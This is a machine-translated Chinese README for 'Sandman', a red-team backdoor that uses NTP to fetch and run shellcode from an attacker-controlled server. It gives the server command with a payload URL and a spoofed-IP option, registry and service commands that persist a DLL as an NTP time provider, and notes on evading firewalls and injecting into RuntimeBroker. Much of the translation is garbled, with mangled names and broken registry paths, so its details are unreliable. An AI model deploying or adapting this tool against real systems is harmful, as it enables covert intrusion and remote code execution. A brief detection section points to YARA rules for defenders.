Sandman

桑德曼（Sandman）是一个后门，旨在在红色团队参与期间在硬化网络上工作。

桑德曼（Sandman）用作stager，并利用NTP（同步时间和日期的协议）从预定义的服务器中获取并运行任意的壳牌。

由于NTP是一项协议，该协议被许多防御者忽略，导致广泛的网络可访问性。

在Windows / *Nix机器上运行：

python3 sandman_server.py " Network Adapter " " Payload Url " " optional: ip to spoof "

• 网络适​​配器：您希望服务器侦听的适配器（例如Windows的以太网， *Nix的ETH0）。

• 有效载荷URL：您的壳牌码的URL，可能是您的代理商（例如，钴ststrike或Meterpreter）或其他stager。

• IP欺骗：如果您想欺骗合法的IP地址（例如，time.microsoft.com的IP地址）。

首先，您可以如下所述编译SandManbackDoor，因为它是一个轻巧的C＃可执行文件，您可以通过执行eodeassembly执行它，作为NTP提供商运行或仅执行/注射。

要使用它，您将需要遵循简单的步骤：

• 添加以下注册表值：

 reg add " HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeTimeProvidersNtpClient " /v DllName /t REG_SZ /d " C:PathToTheDll.dll "

• 重新启动W32Time服务：

 sc stop w32time
sc start w32time

注意：确保您使用X64选项编译，而不是任何CPU选项！

• 从攻击者的受控服务器中获取并执行任意有效载荷。

• 由于通常在FW中允许NTP，因此可以在硬化网络上工作。

• 通过IP欺骗来冒充合法的NTP服务器。

• Python 3.9

• 要求在需求文件中指定。

为了编译后门，我使用了Visual Studio 2022，但是如“用法”部分中提到的，可以使用VS2022和CSC编译。您可以使用use_shellcode并使用Orca的ShellCode或不使用use_shellcode来对其进行编译。

要编译后门我使用了Visual Studio 2022，您还需要安装DLLEXPORT（通过Nuget或任何其他方式）来编译它。您可以使用use_shellcode并使用Orca的ShellCode或不使用use_shellcode来对其进行编译。

• 将ShellCode注入RuntimeBroker。

• 可疑的NTP通信始于已知的魔术标头。

• Yara规则。

• 孔尺寸的逆戟鲸。

• 特别感谢蒂姆·麦加芬（Tim McGuffin）的时间提供商的想法。

感谢那些已经做出贡献的人，我会很乐意接受贡献，提出一个拉动请求，我将对其进行审查！